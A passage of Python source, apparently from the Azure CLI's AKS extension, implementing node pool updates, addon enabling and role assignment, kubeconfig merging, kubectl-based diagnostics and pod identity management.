return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
max_surge=None,
mode=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
_ensure_container_insights_for_monitoring(
cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME])
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
_add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon in [CONST_MONITORING_ADDON_NAME, CONST_AZURE_DEFENDER_ADDON_NAME]:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID if addon == CONST_MONITORING_ADDON_NAME else CONST_AZURE_DEFENDER_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError(f'The {addon} addon is already enabled for this managed cluster.\n'
f'To change {addon} configuration, run "az aks disable-addons -a {addon}"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = _ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = _sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {
logAnalyticsConstName: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
'To change confcom configuration, run '
f'"az aks disable-addons -a confcom -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
elif addon == CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The azure-keyvault-secrets-provider addon is already enabled for this managed cluster.\n'
'To change azure-keyvault-secrets-provider configuration, run '
f'"az aks disable-addons -a azure-keyvault-secrets-provider -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addon_profiles[addon] = addon_profile
else:
if addon not in addon_profiles:
if addon == CONST_KUBE_DASHBOARD_ADDON_NAME:
addon_profiles[addon] = ManagedClusterAddonProfile(
enabled=False)
else:
raise CLIError(
"The addon {} is not installed.".format(addon))
addon_profiles[addon].config = None
addon_profiles[addon].enabled = enable
instance.addon_profiles = addon_profiles
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return instance
def aks_get_versions(cmd, client, location): # pylint: disable=unused-argument
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_os_options(cmd, client, location): # pylint: disable=unused-argument
return client.get_os_options(location, resource_type='managedClusters')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _handle_merge(existing, addition, key, replace):
if not addition[key]:
return
if existing[key] is None:
existing[key] = addition[key]
return
for i in addition[key]:
for j in existing[key]:
if i['name'] == j['name']:
if replace or i == j:
existing[key].remove(j)
else:
from knack.prompting import prompt_y_n
msg = 'A different object named {} already exists in your kubeconfig file.\nOverwrite?'
overwrite = False
try:
overwrite = prompt_y_n(msg.format(i['name']))
except NoTTYException:
pass
if overwrite:
existing[key].remove(j)
else:
msg = 'A different object named {} already exists in {} in your kubeconfig file.'
raise CLIError(msg.format(i['name'], key))
existing[key].append(i)
def load_kubernetes_configuration(filename):
try:
with open(filename) as stream:
return yaml.safe_load(stream)
except (IOError, OSError) as ex:
if getattr(ex, 'errno', 0) == errno.ENOENT:
raise CLIError('{} does not exist'.format(filename))
except (yaml.parser.ParserError, UnicodeDecodeError) as ex:
raise CLIError('Error parsing {} ({})'.format(filename, str(ex)))
def merge_kubernetes_configurations(existing_file, addition_file, replace, context_name=None):
existing = load_kubernetes_configuration(existing_file)
addition = load_kubernetes_configuration(addition_file)
if context_name is not None:
addition['contexts'][0]['name'] = context_name
addition['contexts'][0]['context']['cluster'] = context_name
addition['clusters'][0]['name'] = context_name
addition['current-context'] = context_name
# rename the admin context so it doesn't overwrite the user context
for ctx in addition.get('contexts', []):
try:
if ctx['context']['user'].startswith('clusterAdmin'):
admin_name = ctx['name'] + '-admin'
addition['current-context'] = ctx['name'] = admin_name
break
except (KeyError, TypeError):
continue
if addition is None:
raise CLIError(
'failed to load additional configuration from {}'.format(addition_file))
if existing is None:
existing = addition
else:
_handle_merge(existing, addition, 'clusters', replace)
_handle_merge(existing, addition, 'users', replace)
_handle_merge(existing, addition, 'contexts', replace)
existing['current-context'] = addition['current-context']
# check that ~/.kube/config is only read- and writable by its owner
if platform.system() != 'Windows':
existing_file_perms = "{:o}".format(
stat.S_IMODE(os.lstat(existing_file).st_mode))
if not existing_file_perms.endswith('600'):
logger.warning('%s has permissions "%s".\nIt should be readable and writable only by its owner.',
existing_file, existing_file_perms)
with open(existing_file, 'w+') as stream:
yaml.safe_dump(existing, stream, default_flow_style=False)
current_context = addition.get('current-context', 'UNKNOWN')
msg = 'Merged "{}" as current context in {}'.format(
current_context, existing_file)
print(msg)
def cloud_storage_account_service_factory(cli_ctx, kwargs):
from azure.cli.core.profiles import ResourceType, get_sdk
t_cloud_storage_account = get_sdk(
cli_ctx, ResourceType.DATA_STORAGE, 'common#CloudStorageAccount')
account_name = kwargs.pop('account_name', None)
account_key = kwargs.pop('account_key', None)
sas_token = kwargs.pop('sas_token', None)
kwargs.pop('connection_string', None)
return t_cloud_storage_account(account_name, account_key, sas_token)
def get_storage_account_from_diag_settings(cli_ctx, resource_group_name, name):
from azure.mgmt.monitor import MonitorManagementClient
diag_settings_client = get_mgmt_service_client(
cli_ctx, MonitorManagementClient).diagnostic_settings
subscription_id = get_subscription_id(cli_ctx)
aks_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService' \
'/managedClusters/{2}'.format(subscription_id,
resource_group_name, name)
diag_settings = diag_settings_client.list(aks_resource_id)
if diag_settings.value:
return diag_settings.value[0].storage_account_id
print("No diag settings specified")
return None
def display_diagnostics_report(temp_kubeconfig_path): # pylint: disable=too-many-statements
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
nodes = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "node", "--no-headers"],
universal_newlines=True)
logger.debug(nodes)
node_lines = nodes.splitlines()
ready_nodes = {}
for node_line in node_lines:
columns = node_line.split()
logger.debug(node_line)
if columns[1] != "Ready":
logger.warning(
"Node %s is not Ready. Current state is: %s.", columns[0], columns[1])
else:
ready_nodes[columns[0]] = False
logger.debug('There are %s ready nodes in the cluster',
str(len(ready_nodes)))
if not ready_nodes:
logger.warning(
'No nodes are ready in the current cluster. Diagnostics info might not be available.')
network_config_array = []
network_status_array = []
apds_created = False
max_retry = 10
for retry in range(0, max_retry):
if not apds_created:
apd = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path, "get",
"apd", "-n", "aks-periscope", "--no-headers"],
universal_newlines=True
)
apd_lines = apd.splitlines()
if apd_lines and 'No resources found' in apd_lines[0]:
apd_lines.pop(0)
print("Got {} diagnostic results for {} ready nodes{}\r".format(len(apd_lines),
len(ready_nodes),
'.' * retry), end='')
if len(apd_lines) < len(ready_nodes):
time.sleep(3)
else:
apds_created = True
print()
else:
for node_name in ready_nodes:
if ready_nodes[node_name]:
continue
apdName = "aks-periscope-diagnostic-" + node_name
try:
network_config = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkconfig}"],
universal_newlines=True)
logger.debug('Dns status for node %s is %s',
node_name, network_config)
network_status = subprocess.check_output(
["kubectl", "--kubeconfig", temp_kubeconfig_path,
"get", "apd", apdName, "-n",
"aks-periscope", "-o=jsonpath={.spec.networkoutbound}"],
universal_newlines=True)
logger.debug('Network status for node %s is %s',
node_name, network_status)
if not network_config or not network_status:
print("The diagnostics information for node {} is not ready yet. "
"Will try again in 10 seconds.".format(node_name))
time.sleep(10)
break
network_config_array += json.loads(
'[' + network_config + ']')
network_status_object = json.loads(network_status)
network_status_array += format_diag_status(
network_status_object)
ready_nodes[node_name] = True
except subprocess.CalledProcessError as err:
raise CLIError(err.output)
print()
if network_config_array:
print("Below are the network configuration for each node: ")
print()
print(tabulate(network_config_array, headers="keys", tablefmt='simple'))
print()
else:
logger.warning("Could not get network config. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
if network_status_array:
print("Below are the network connectivity results for each node:")
print()
print(tabulate(network_status_array, headers="keys", tablefmt='simple'))
else:
logger.warning("Could not get networking status. "
"Please run 'az aks kanalyze' command later to get the analysis results.")
def format_diag_status(diag_status):
for diag in diag_status:
if diag["Status"]:
if "Error:" in diag["Status"]:
diag["Status"] = f'{colorama.Fore.RED}{diag["Status"]}{colorama.Style.RESET_ALL}'
else:
diag["Status"] = f'{colorama.Fore.GREEN}{diag["Status"]}{colorama.Style.RESET_ALL}'
return diag_status
def format_bright(msg):
return f'\033[1m{colorama.Style.BRIGHT}{msg}{colorama.Style.RESET_ALL}'
def format_hyperlink(the_link):
return f'\033[1m{colorama.Style.BRIGHT}{colorama.Fore.BLUE}{the_link}{colorama.Style.RESET_ALL}'
def get_aks_custom_headers(aks_custom_headers=None):
headers = {}
if aks_custom_headers is not None:
if aks_custom_headers != "":
for pair in aks_custom_headers.split(','):
parts = pair.split('=')
if len(parts) != 2:
raise CLIError('custom headers format is incorrect')
headers[parts[0]] = parts[1]
return headers
def _put_managed_cluster_ensuring_permission(
cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
subscription_id,
resource_group_name,
name,
managed_cluster,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
virtual_node_addon_enabled,
need_grant_vnet_permission_to_cluster_identity,
vnet_subnet_id,
enable_managed_identity,
attach_acr,
headers,
no_wait
):
# some addons require post cluster creation role assigment
need_post_creation_role_assignment = (monitoring_addon_enabled or
ingress_appgw_addon_enabled or
(enable_managed_identity and attach_acr) or
virtual_node_addon_enabled or
need_grant_vnet_permission_to_cluster_identity)
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
cluster = LongRunningOperation(cmd.cli_ctx)(client.create_or_update(
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers))
cloud_name = cmd.cli_ctx.cloud.name
# add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
# mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
_add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
_add_ingress_appgw_addon_role_assignment(cluster, cmd)
if virtual_node_addon_enabled:
_add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
if need_grant_vnet_permission_to_cluster_identity:
if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
cluster.identity.principal_id, scope=vnet_subnet_id,
resolve_assignee=False):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
if enable_managed_identity and attach_acr:
# Attach ACR to cluster enabled managed identity
if cluster.identity_profile is None or \
cluster.identity_profile["kubeletidentity"] is None:
logger.warning('Your cluster is successfully created, but we failed to attach '
'acr to it, you can manually grant permission to the identity '
'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
'it permission to pull from ACR.')
else:
kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
_ensure_aks_acr(cmd.cli_ctx,
client_id=kubelet_identity_client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
else:
cluster = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name,
resource_name=name,
parameters=managed_cluster,
custom_headers=headers)
return cluster
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or managed_cluster.identity.type.casefold() == "userassigned"))
def _get_kubelet_config(file_path):
kubelet_config = get_file_json(file_path)
if not isinstance(kubelet_config, dict):
raise CLIError(
"Error reading kubelet configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = KubeletConfig()
config_object.cpu_manager_policy = kubelet_config.get(
"cpuManagerPolicy", None)
config_object.cpu_cfs_quota = kubelet_config.get("cpuCfsQuota", None)
config_object.cpu_cfs_quota_period = kubelet_config.get(
"cpuCfsQuotaPeriod", None)
config_object.image_gc_high_threshold = kubelet_config.get(
"imageGcHighThreshold", None)
config_object.image_gc_low_threshold = kubelet_config.get(
"imageGcLowThreshold", None)
config_object.topology_manager_policy = kubelet_config.get(
"topologyManagerPolicy", None)
config_object.allowed_unsafe_sysctls = kubelet_config.get(
"allowedUnsafeSysctls", None)
config_object.fail_swap_on = kubelet_config.get("failSwapOn", None)
return config_object
def _get_linux_os_config(file_path):
os_config = get_file_json(file_path)
if not isinstance(os_config, dict):
raise CLIError(
"Error reading Linux OS configuration at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object = LinuxOSConfig()
config_object.transparent_huge_page_enabled = os_config.get(
"transparentHugePageEnabled", None)
config_object.transparent_huge_page_defrag = os_config.get(
"transparentHugePageDefrag", None)
config_object.swap_file_size_mb = os_config.get("swapFileSizeMB", None)
# sysctl settings
sysctls = os_config.get("sysctls", None)
if not isinstance(sysctls, dict):
raise CLIError(
"Error reading Sysctl settings at {}. Please see https://aka.ms/CustomNodeConfig for correct format.".format(file_path))
config_object.sysctls = SysctlConfig()
config_object.sysctls.net_core_somaxconn = sysctls.get(
"netCoreSomaxconn", None)
config_object.sysctls.net_core_netdev_max_backlog = sysctls.get(
"netCoreNetdevMaxBacklog", None)
config_object.sysctls.net_core_rmem_max = sysctls.get(
"netCoreRmemMax", None)
config_object.sysctls.net_core_wmem_max = sysctls.get(
"netCoreWmemMax", None)
config_object.sysctls.net_core_optmem_max = sysctls.get(
"netCoreOptmemMax", None)
config_object.sysctls.net_ipv4_tcp_max_syn_backlog = sysctls.get(
"netIpv4TcpMaxSynBacklog", None)
config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
def _is_pod_identity_addon_enabled(instance):
if not instance:
return False
if not instance.pod_identity_profile:
return False
return bool(instance.pod_identity_profile.enabled)
def _ensure_pod_identity_addon_is_enabled(instance):
if not _is_pod_identity_addon_enabled(instance):
raise CLIError('The pod identity addon is not enabled for this managed cluster yet.\n'
'To enable, run "az aks update --enable-pod-identity')
def _ensure_pod_identity_kubenet_consent(network_profile, pod_identity_profile, customer_consent):
if not network_profile or not network_profile.network_plugin:
# invalid data
return
if network_profile.network_plugin.lower() != 'kubenet':
# not kubenet, no need to check
return
if customer_consent is None:
# no set this time, read from previous value
customer_consent = bool(
pod_identity_profile.allow_network_plugin_kubenet)
if not customer_consent:
raise CLIError(
'--enable-pod-identity-with-kubenet is required for enabling pod identity addon when using Kubenet network plugin')
pod_identity_profile.allow_network_plugin_kubenet = True
def _update_addon_pod_identity(instance, enable, pod_identities=None, pod_identity_exceptions=None, allow_kubenet_consent=None):
if not enable:
# when disable, remove previous saved value
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=False)
return
if not instance.pod_identity_profile:
# not set before
instance.pod_identity_profile = ManagedClusterPodIdentityProfile(
enabled=enable,
user_assigned_identities=pod_identities,
user_assigned_identity_exceptions=pod_identity_exceptions,
)
_ensure_pod_identity_kubenet_consent(
instance.network_profile, instance.pod_identity_profile, allow_kubenet_consent)
instance.pod_identity_profile.enabled = enable
instance.pod_identity_profile.user_assigned_identities = pod_identities or []
instance.pod_identity_profile.user_assigned_identity_exceptions = pod_identity_exceptions or []
def _ensure_managed_identity_operator_permission(cli_ctx, instance, scope):
cluster_identity_object_id = None
if instance.identity.type.lower() == 'userassigned':
for identity in instance.identity.user_assigned_identities.values():
cluster_identity_object_id = identity.principal_id
break
elif instance.identity.type.lower() == 'systemassigned':
cluster_identity_object_id = instance.identity.principal_id
else:
raise CLIError('unsupported identity type: {}'.format(
instance.identity.type))
if cluster_identity_object_id is None:
raise CLIError('unable to resolve cluster identity')
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission for cluster')
# need more time to propogate this assignment...
print()
print('Wait 30 seconds for identity role assignment propagation.')
time.sleep(30)
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
